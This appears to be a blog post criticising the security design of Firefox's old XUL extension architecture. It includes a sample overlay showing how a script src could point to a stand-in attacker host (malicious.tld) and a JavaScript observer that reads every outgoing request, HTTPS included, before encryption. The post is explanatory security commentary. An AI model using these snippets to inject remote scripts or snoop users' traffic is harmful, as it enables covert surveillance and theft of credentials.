"I agree, this isn't really novel.
It's an interesting POC, but if I have local access to your file system, there are tons of easy ways to own you...
We just don't have systems that were designed to stand up to local access, case closed. An attacker could just as easily modify one of Firefox's own executables or libraries, your proxy settings, etc..."
So to Steve, thanks for setting me straight - and now, with the "Big Picture" in mind, I'm writing this as a 49,998ft view of the whole mess.
Let's think about this logically, since there are many things at play here. First, there's Firefox's use of XUL for things like the extension manifest... which allows for arbitrary script tags! Granted, most of the .xul files I witnessed first-hand referenced "chrome://xxxxx" URLs, but a reference could just as easily be "https://malicious.tld/malicious.js" or something of that nature. To say that this is a bad way of doing it is an understatement - but what's the real issue? The real issue is that Mozilla went for simplicity, speed, and extensibility over security - an obvious choice, made many times over. Next, let's look at the amount of effort it would take to change this mechanism. Even if Mozilla did decide to change the way extensions function - MD5sum that file and store the hash somewhere, or whatever - it would immediately break every single extension. Granted, Mozilla developers are famous for breaking extensions from version to version (even on minor revs!), but this would anger more than just a few people.
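For concreteness, here's roughly what such a script reference looks like in a XUL overlay of that era (the extension id and file names here are made up for illustration):

```xml
<?xml version="1.0"?>
<overlay id="myext-overlay"
         xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

  <!-- The usual, benign case: a script loaded from the
       extension's own chrome package -->
  <script type="application/x-javascript"
          src="chrome://myext/content/overlay.js"/>

  <!-- Nothing structural stops that src from being swapped
       for a remote URL, e.g.:
       <script type="application/x-javascript"
               src="https://malicious.tld/malicious.js"/> -->

</overlay>
```

The point is that whatever ends up in that `src` runs with the same chrome privileges as the rest of the overlay - the format itself draws no line between the two cases.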
Next, let's think about the problem in the macrocosm of nastiness on the web. We are taught not to trust the web, or anything that comes from a source we don't explicitly trust. But how do we know what to trust? I personally have at least 5 extensions in my Firefox browser whose source code I never even pretended to look at. Are they stealing keystrokes, logging my bank passwords?... who knows! The problem is that they pop up like mushrooms after a spring rain - and no one is realistically going to review them all... certainly not the Mozilla folks.
Perhaps the hardest-to-swallow design flaw is that plug-ins and extensions have access to the browser's raw data stream... before it hits the encryption routines. This effectively means a plug-in has access not only to keystrokes, URLs, and the full text of your POSTs, but to all of it before it is ever encrypted onto the SSL stream. Talk about game over!
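As a sketch of what I mean - using the observer notification mechanism that chrome-privileged extension code of this era has access to, with variable names of my own choosing - an extension can register for "http-on-modify-request" and see every outgoing request, HTTPS included, in the clear:

```javascript
// Only runs inside Firefox's chrome-privileged extension context;
// "Components" is a global there, not available to ordinary page script.
var observerService = Components.classes["@mozilla.org/observer-service;1"]
                                .getService(Components.interfaces.nsIObserverService);

var snooper = {
  observe: function (subject, topic, data) {
    var channel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
    // channel.URI.spec is the full URL - even for https:// requests -
    // because this notification fires before the request reaches the SSL layer.
    dump("outgoing request: " + channel.URI.spec + "\n");
    // POST bodies are similarly reachable through the channel's upload stream.
  }
};

observerService.addObserver(snooper, "http-on-modify-request", false);
```

No exploit is involved here; this is ordinary, sanctioned extension plumbing, which is precisely the problem.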
In the final analysis, at least for me, it doesn't really matter that Firefox chooses to use XUL, which allows for an arbitrary script tag in the extension manifest file... although that is a seriously neat trick. What really matters is that the attack surface of Firefox is laid bare through the plug-in/extension architecture, which in my humble opinion is fundamentally flawed from a security perspective. It doesn't matter if we sign/encrypt/check-and-recheck that manifest file for a maliciously injected script src="http://malicious.tld/malicious.js" ... the browser is hosed anyway, long before that.
I'm hoping this sparks the Mozilla folks to re-examine their architecture and seriously re-design their plug-in/extension interface... I offer my humble support should it be requested.